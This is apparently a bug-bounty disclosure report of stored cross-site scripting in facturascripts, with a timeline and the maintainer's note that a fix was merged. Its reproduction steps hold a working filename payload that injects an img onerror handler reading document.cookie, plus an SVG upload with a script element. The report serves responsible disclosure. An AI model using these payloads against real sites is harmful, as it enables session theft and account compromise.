Multiple Store XSS via upload svg file and the file name of attachment in neorazorx/facturascripts


Reported on

Apr 27th 2022


Hi There, facturascripts is vulnerable to store XSS by upload svg file, and the filename

Step to produce with svg file

Login as admin or any account has role Admin->Library, access Admin -> library -> New and upload file svg with content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">

save this. XSS will be trigger when you download it.


Step to produce with file name payload:

just upload file with the file name: %22><img src=x onerror=alert(document.cookie).xlsx -> xss will be trigger


This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
minhnb modified the report
a month ago
minhnb modified the report
a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
minhnb has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 1d1edb a month ago
The fix bounty has been dropped
a month ago


Carlos Garcia
a month ago


You're right. I have corrected it in this commit

Thank you so much for everything

to join this conversation